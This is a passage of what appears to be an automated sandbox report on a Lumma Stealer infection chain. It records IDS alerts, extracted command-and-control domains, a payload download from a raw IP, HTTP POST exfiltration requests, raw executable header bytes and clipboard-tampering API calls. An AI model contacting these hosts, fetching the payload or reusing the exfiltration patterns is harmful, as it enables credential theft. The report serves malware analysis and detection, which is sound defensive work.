        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0077ECC9
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0075AC99
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0077BD67
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00775D57
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00755D17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00755D17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00766D15
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0077EDC6
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0076AD91
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0076BD88
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0077DE57
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0076BE2C
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00790E12
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0077EE1A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0077BE07
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0077EE08
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00792F87

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49747 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49747 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49753 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49753 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49764 -> 104.21.64.1:443
        Source: Malware configuration extractorURLs: handscreamny.shop
        Source: Malware configuration extractorURLs: femalsabler.shop
        Source: Malware configuration extractorURLs: soundtappysk.shop
        Source: Malware configuration extractorURLs: versersleep.shop
        Source: Malware configuration extractorURLs: robinsharez.shop
        Source: Malware configuration extractorURLs: apporholis.shop
        Source: Malware configuration extractorURLs: chipdonkeruz.shop
        Source: Malware configuration extractorURLs: skidjazzyric.click
        Source: Malware configuration extractorURLs: crowdwarek.shop
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 09 Jan 2025 07:33:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 09 Jan 2025 07:30:02 GMTETag: "53600-62b40f23d5dfc"Accept-Ranges: bytesContent-Length: 341504Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 2a 04 00 28 00 00 00 00 d0 04 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 47 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 86 00 00 00 40 04 00 00 60 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 bc 00 00 00 d0 04 00 00 ae 00 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
        Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49753 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49764 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49782 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 104.21.64.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49715 -> 104.21.56.70:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QYJK4DM0PCEPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DFN4NM2K8YOHJDWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15088Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CV3YHPTLGJRPARNJ21KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19964Host: skidjazzyric.click
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: Ljrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: Ljrprfl3BH.exe, 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
        Source: Ljrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe9
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeTr
        Source: Ljrprfl3BH.exe, 00000000.00000003.2265071299.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeX
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: BF85.tmp.exe, 00000003.00000003.2336460377.0000000002E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: Ljrprfl3BH.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: Ljrprfl3BH.exe, 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2351320753.0000000000889000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2335505836.0000000000889000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000002.2393770639.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/
        Source: BF85.tmp.exe, 00000003.00000003.2349520875.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2320717496.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2337760386.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2332363613.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/api
        Source: BF85.tmp.exe, 00000003.00000002.2394282127.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2351282568.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2331967620.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2335322114.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2349406534.0000000002F15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/apiXxZ9NjAAA=
        Source: BF85.tmp.exe, 00000003.00000003.2320794953.0000000002E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/api
        Source: BF85.tmp.exe, 00000003.00000003.2320717496.0000000002E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/api:
        Source: BF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: BF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: BF85.tmp.exe, 00000003.00000003.2304012002.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2304366741.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305130946.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: BF85.tmp.exe, 00000003.00000003.2337560118.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
        Source: BF85.tmp.exe, 00000003.00000003.2337560118.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
        Source: BF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
        Source: BF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
        Source: BF85.tmp.exe, 00000003.00000003.2337884913.0000000003185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49782 version: TLS 1.2
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_02191942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02191942
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
